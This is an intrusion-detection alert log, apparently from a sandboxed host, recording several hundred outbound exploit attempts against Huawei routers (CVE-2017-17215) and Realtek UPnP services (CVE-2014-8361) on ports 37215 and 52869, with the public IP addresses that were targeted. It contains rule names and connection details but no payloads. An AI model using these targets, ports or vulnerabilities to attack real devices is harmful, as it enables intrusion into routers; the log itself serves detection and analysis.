                                      07/20/24-23:00:57.221220TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5819637215192.168.2.23197.77.131.53
                                      07/20/24-23:01:27.749737TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4838437215192.168.2.2341.190.230.210
                                      07/20/24-23:01:21.943544TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5298637215192.168.2.2360.142.88.137
                                      07/20/24-23:01:47.433470TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24013652869192.168.2.2382.79.140.185
                                      07/20/24-23:01:02.057729TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5113237215192.168.2.23157.212.218.203
                                      07/20/24-23:01:53.923127TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4621652869192.168.2.2378.233.35.58
                                      07/20/24-23:01:44.155894TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4380252869192.168.2.23107.189.251.198
                                      07/20/24-23:01:43.121284TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614011252869192.168.2.2387.254.251.88
                                      07/20/24-23:01:45.095767TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614216452869192.168.2.2386.220.55.191
                                      07/20/24-23:02:04.748522TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614777852869192.168.2.2397.69.50.199
                                      07/20/24-23:01:46.495508TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614459052869192.168.2.23207.214.48.137
                                      07/20/24-23:01:04.040812TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6034037215192.168.2.2341.218.114.123
                                      07/20/24-23:01:09.891414TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613496252869192.168.2.23131.120.226.33
                                      07/20/24-23:01:45.978835TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614001652869192.168.2.23179.51.3.253
                                      07/20/24-23:01:47.486502TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5510252869192.168.2.2338.182.132.190
                                      07/20/24-23:01:08.619598TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4325852869192.168.2.2357.224.40.86
                                      07/20/24-23:01:11.634372TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5960637215192.168.2.2341.69.22.214
                                      07/20/24-23:01:25.498619TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5657852869192.168.2.23119.38.147.179
                                      07/20/24-23:01:43.110964TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616093252869192.168.2.2373.152.115.130
                                      07/20/24-23:01:34.048825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5379237215192.168.2.23157.199.109.79
                                      07/20/24-23:01:09.021221TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4716452869192.168.2.23221.226.241.204
                                      07/20/24-23:01:45.298541TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3944452869192.168.2.2338.110.137.130
                                      07/20/24-23:01:50.128003TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25021852869192.168.2.23118.32.91.217
                                      07/20/24-23:01:51.875785TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5931252869192.168.2.23159.88.48.35
                                      07/20/24-23:01:41.370646TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3608052869192.168.2.2334.44.162.23
                                      07/20/24-23:01:31.331820TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3935452869192.168.2.239.241.118.240
                                      07/20/24-23:01:58.624224TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5439252869192.168.2.23101.35.135.206
                                      07/20/24-23:01:47.924852TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25200252869192.168.2.23143.225.143.5
                                      07/20/24-23:01:41.343266TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615493652869192.168.2.23220.17.179.230
                                      07/20/24-23:01:24.885895TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5543837215192.168.2.2341.201.237.240
                                      07/20/24-23:01:01.448947TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614133252869192.168.2.23119.187.229.164
                                      07/20/24-23:01:42.042815TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615682652869192.168.2.23157.210.162.125
                                      07/20/24-23:01:20.131339TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5747237215192.168.2.23197.74.155.53
                                      07/20/24-23:01:08.556804TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5765852869192.168.2.2323.94.137.105
                                      07/20/24-23:01:08.611773TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5447452869192.168.2.2391.233.41.28
                                      07/20/24-23:01:27.654172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3621237215192.168.2.23197.163.51.90
                                      07/20/24-23:01:43.177552TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5851252869192.168.2.2383.205.44.142
                                      07/20/24-23:01:53.971751TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23912052869192.168.2.23133.40.152.48
                                      07/20/24-23:01:57.747300TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615758452869192.168.2.23187.17.35.77
                                      07/20/24-23:01:24.877747TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5086837215192.168.2.2339.16.82.179
                                      07/20/24-23:01:52.919383TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25593252869192.168.2.2327.248.134.22
                                      07/20/24-23:01:46.348899TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25333852869192.168.2.23138.36.169.221
                                      07/20/24-23:01:49.946258TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614293652869192.168.2.23168.75.31.114
                                      07/20/24-23:01:03.958922TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6007652869192.168.2.23206.248.87.37
                                      07/20/24-23:01:44.950737TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25188652869192.168.2.23221.199.165.178
                                      07/20/24-23:01:24.943244TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5597837215192.168.2.2341.9.4.247
                                      07/20/24-23:01:43.978983TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25738452869192.168.2.23133.252.225.26
                                      07/20/24-23:01:52.006906TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5098252869192.168.2.2331.246.229.175
                                      07/20/24-23:01:41.660997TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5399652869192.168.2.23151.105.247.52
                                      07/20/24-23:01:04.058922TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5666837215192.168.2.2341.51.105.40
                                      07/20/24-23:01:10.666264TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614165852869192.168.2.2372.182.219.141
                                      07/20/24-23:01:06.991143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3980637215192.168.2.23197.25.151.108
                                      07/20/24-23:01:51.698859TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614324652869192.168.2.2379.129.206.60
                                      07/20/24-23:01:56.353592TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3976852869192.168.2.23202.177.22.97
                                      07/20/24-23:01:53.354788TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3279452869192.168.2.2394.86.220.196
                                      07/20/24-23:01:44.713195TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4750452869192.168.2.23105.221.97.172
                                      07/20/24-23:01:32.034562TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6067637215192.168.2.2374.90.46.163
                                      07/20/24-23:01:57.330552TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24125652869192.168.2.23206.154.64.238
                                      07/20/24-23:01:20.591485TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25257052869192.168.2.23100.41.144.113
                                      07/20/24-23:01:56.504220TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5845252869192.168.2.2379.45.122.255
                                      07/20/24-23:01:44.795218TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613836652869192.168.2.2312.154.226.190
                                      07/20/24-23:01:24.929013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3660037215192.168.2.23197.202.30.34
                                      07/20/24-23:01:45.521019TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23443252869192.168.2.2337.165.17.202
                                      07/20/24-23:01:46.439367TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24490852869192.168.2.23119.138.76.79
                                      07/20/24-23:01:24.510301TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4191852869192.168.2.23144.247.247.76
                                      07/20/24-23:00:59.175742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3762237215192.168.2.23196.108.213.184
                                      07/20/24-23:01:47.455724TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6099852869192.168.2.2338.85.208.126
                                      07/20/24-23:01:04.192511TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615848452869192.168.2.23186.129.229.179
                                      07/20/24-23:01:51.790169TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3752852869192.168.2.23183.223.8.125
                                      07/20/24-23:01:20.124696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5323437215192.168.2.2341.237.97.145
                                      07/20/24-23:01:24.883172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3655237215192.168.2.23181.24.138.22
                                      07/20/24-23:01:31.323043TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5991652869192.168.2.23213.157.19.102
                                      07/20/24-23:01:49.167711TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613902852869192.168.2.23157.109.59.232
                                      07/20/24-23:01:49.901282TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615483452869192.168.2.23105.93.17.46
                                      07/20/24-23:01:08.578116TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23437452869192.168.2.2325.222.248.206
                                      07/20/24-23:01:40.321300TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5555437215192.168.2.23197.224.157.32
                                      07/20/24-23:01:44.350602TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3627652869192.168.2.234.9.166.109
                                      07/20/24-23:01:56.315740TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5812652869192.168.2.2319.194.171.63
                                      07/20/24-23:01:58.719313TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5842452869192.168.2.23159.133.17.143
                                      07/20/24-23:01:03.432937TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5860252869192.168.2.23140.186.145.164
                                      07/20/24-23:01:02.470704TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614581052869192.168.2.23129.194.41.40
                                      07/20/24-23:01:40.285039TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4493837215192.168.2.23197.32.142.171
                                      07/20/24-23:01:21.936545TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6099637215192.168.2.23157.58.196.213
                                      07/20/24-23:01:47.674845TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4413452869192.168.2.23134.168.191.164
                                      07/20/24-23:01:32.027082TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3930837215192.168.2.23139.146.7.44
                                      07/20/24-23:01:45.159648TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24721252869192.168.2.2357.189.118.114
                                      07/20/24-23:01:51.213578TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24116052869192.168.2.2313.35.187.229
                                      07/20/24-23:01:02.721582TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4004852869192.168.2.23209.101.108.92
                                      07/20/24-23:01:45.926465TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3584052869192.168.2.23213.132.50.155
                                      07/20/24-23:01:14.284488TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6045237215192.168.2.23157.13.148.173
                                      07/20/24-23:01:20.161614TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4519237215192.168.2.23124.82.46.132
                                      07/20/24-23:01:08.912088TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23490652869192.168.2.23195.67.134.63
                                      07/20/24-23:01:27.656128TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5209837215192.168.2.23210.252.39.6
                                      07/20/24-23:01:46.530676TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25031652869192.168.2.23177.9.244.61
                                      07/20/24-23:01:55.797133TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615526252869192.168.2.23163.86.195.181
                                      07/20/24-23:01:20.131339TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5050437215192.168.2.23197.233.197.166
                                      07/20/24-23:01:06.996056TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5958237215192.168.2.23157.57.251.26
                                      07/20/24-23:01:08.938949TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5109052869192.168.2.23142.90.33.83
                                      07/20/24-23:01:40.334452TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5621637215192.168.2.23144.60.118.98
                                      07/20/24-23:01:44.993925TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613695852869192.168.2.23114.19.125.68
                                      07/20/24-23:02:01.357047TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614906852869192.168.2.23185.217.197.57
                                      07/20/24-23:01:44.510114TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614952252869192.168.2.23108.46.15.204
                                      07/20/24-23:01:10.977084TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616017052869192.168.2.23183.182.103.28
                                      07/20/24-23:01:11.635828TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4141037215192.168.2.23138.191.112.237
                                      07/20/24-23:01:31.976795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5714837215192.168.2.23197.17.160.123
                                      07/20/24-23:00:59.191389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5740837215192.168.2.23197.6.34.101
                                      07/20/24-23:01:57.169212TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615743852869192.168.2.23149.53.250.19
                                      07/20/24-23:01:44.589820TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4133452869192.168.2.23108.54.73.191
                                      07/20/24-23:01:00.645186TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5354037215192.168.2.23197.36.116.167
                                      07/20/24-23:01:46.312083TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5736452869192.168.2.23170.47.68.177
                                      07/20/24-23:02:03.085082TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4862252869192.168.2.23167.172.23.251
                                      07/20/24-23:01:44.355606TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4654652869192.168.2.23156.133.161.252
                                      07/20/24-23:01:49.302154TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5269052869192.168.2.23190.1.92.156
                                      07/20/24-23:01:41.608574TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615064652869192.168.2.23187.178.228.43
                                      07/20/24-23:01:51.833558TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613483252869192.168.2.2343.180.222.83
                                      07/20/24-23:01:20.593003TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24961652869192.168.2.2378.146.199.168
                                      07/20/24-23:01:08.620788TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4957652869192.168.2.2387.137.214.123
                                      07/20/24-23:02:10.069241TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5865252869192.168.2.239.104.144.169
                                      07/20/24-23:01:43.965131TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4179052869192.168.2.2324.0.173.57
                                      07/20/24-23:01:49.055673TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23480052869192.168.2.2368.106.199.227
                                      07/20/24-23:00:59.148145TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5578437215192.168.2.23197.64.180.236
                                      07/20/24-23:01:53.524925TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615639252869192.168.2.2390.72.98.132
                                      07/20/24-23:02:18.278764TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5680852869192.168.2.2372.193.247.149
                                      07/20/24-23:02:48.156942TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614105452869192.168.2.23211.211.25.32
                                      07/20/24-23:01:24.752424TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615241452869192.168.2.2334.158.218.166
                                      07/20/24-23:01:42.939520TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615055252869192.168.2.23114.151.113.249
                                      07/20/24-23:01:48.083998TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613612652869192.168.2.23132.77.166.224
                                      07/20/24-23:01:52.380418TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3507652869192.168.2.23109.170.40.38
                                      07/20/24-23:01:14.111381TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3549637215192.168.2.2341.138.103.205
                                      07/20/24-23:02:30.172034TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23821652869192.168.2.23148.112.106.138
                                      07/20/24-23:00:59.194576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3739837215192.168.2.2377.13.19.125
                                      07/20/24-23:01:24.886284TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5941637215192.168.2.23157.51.148.163
                                      07/20/24-23:01:47.610546TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4728852869192.168.2.2396.112.20.112
                                      07/20/24-23:01:31.328066TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25634852869192.168.2.2397.247.179.245
                                      07/20/24-23:01:40.301143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4025637215192.168.2.23157.64.8.64
                                      07/20/24-23:02:07.236630TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3763852869192.168.2.23120.153.158.217
                                      07/20/24-23:01:49.116780TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3482252869192.168.2.23191.56.125.219
                                      07/20/24-23:01:07.022763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4424837215192.168.2.23157.79.183.3
                                      07/20/24-23:01:50.131564TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614024052869192.168.2.23104.92.73.201
                                      07/20/24-23:02:48.447183TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4504052869192.168.2.23165.223.82.19
                                      07/20/24-23:01:58.821906TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615120852869192.168.2.2317.116.47.253
                                      07/20/24-23:01:47.541928TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613497852869192.168.2.2380.133.252.53
                                      07/20/24-23:01:42.574571TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4919052869192.168.2.23202.140.13.200
                                      07/20/24-23:02:26.420170TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4459852869192.168.2.23203.88.251.194
                                      07/20/24-23:01:21.915268TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4271437215192.168.2.23157.75.221.250
                                      07/20/24-23:01:43.206219TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5416652869192.168.2.2339.170.42.160
                                      07/20/24-23:02:06.453402TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3472452869192.168.2.23186.206.219.37
                                      07/20/24-23:01:45.214052TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24921052869192.168.2.2352.121.181.216
                                      07/20/24-23:02:02.570955TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616041452869192.168.2.2332.154.214.30
                                      07/20/24-23:01:45.116897TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23835252869192.168.2.2343.216.241.103
                                      07/20/24-23:01:08.615260TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5281652869192.168.2.23212.172.247.72
                                      07/20/24-23:01:11.631134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3387237215192.168.2.2341.120.225.224
                                      07/20/24-23:01:42.758824TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4500452869192.168.2.238.202.120.94
                                      07/20/24-23:01:44.280820TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3787452869192.168.2.23123.227.205.159
                                      07/20/24-23:01:43.642551TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4456852869192.168.2.2354.184.6.19
                                      07/20/24-23:01:08.567236TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5936852869192.168.2.23153.15.211.214
                                      07/20/24-23:01:44.158709TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3361852869192.168.2.231.26.245.187
                                      07/20/24-23:01:57.695259TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5323452869192.168.2.23105.70.135.245
                                      07/20/24-23:01:57.872971TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613589652869192.168.2.23164.20.16.241
                                      07/20/24-23:01:07.016889TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4668437215192.168.2.23197.53.90.124
                                      07/20/24-23:01:24.567513TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3571252869192.168.2.2366.164.253.202
                                      07/20/24-23:01:27.664887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5174837215192.168.2.23135.203.61.14
                                      07/20/24-23:01:51.943792TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614181652869192.168.2.2343.71.121.153
                                      07/20/24-23:02:01.526784TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4899852869192.168.2.2397.69.50.199
                                      07/20/24-23:01:54.702517TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614214852869192.168.2.23222.125.116.173
                                      07/20/24-23:01:42.365783TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26072252869192.168.2.23132.173.89.17
                                      07/20/24-23:01:54.787983TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4155652869192.168.2.232.74.163.138
                                      07/20/24-23:01:59.137101TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6044852869192.168.2.2360.191.4.143
                                      07/20/24-23:01:04.053604TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3749637215192.168.2.2365.192.188.21
                                      07/20/24-23:01:31.978141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5561437215192.168.2.2341.217.46.13
                                      07/20/24-23:02:12.248256TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615800052869192.168.2.2346.119.183.52
                                      07/20/24-23:01:34.048825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4692437215192.168.2.23197.123.40.207
                                      07/20/24-23:01:42.745085TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4737852869192.168.2.232.78.155.76
                                      07/20/24-23:01:43.199406TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614328652869192.168.2.2386.216.107.76
                                      07/20/24-23:01:41.229799TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615951452869192.168.2.23100.0.247.159
                                      07/20/24-23:01:34.044417TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3886437215192.168.2.23157.83.163.2
                                      07/20/24-23:01:44.318262TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615702052869192.168.2.23187.157.152.232
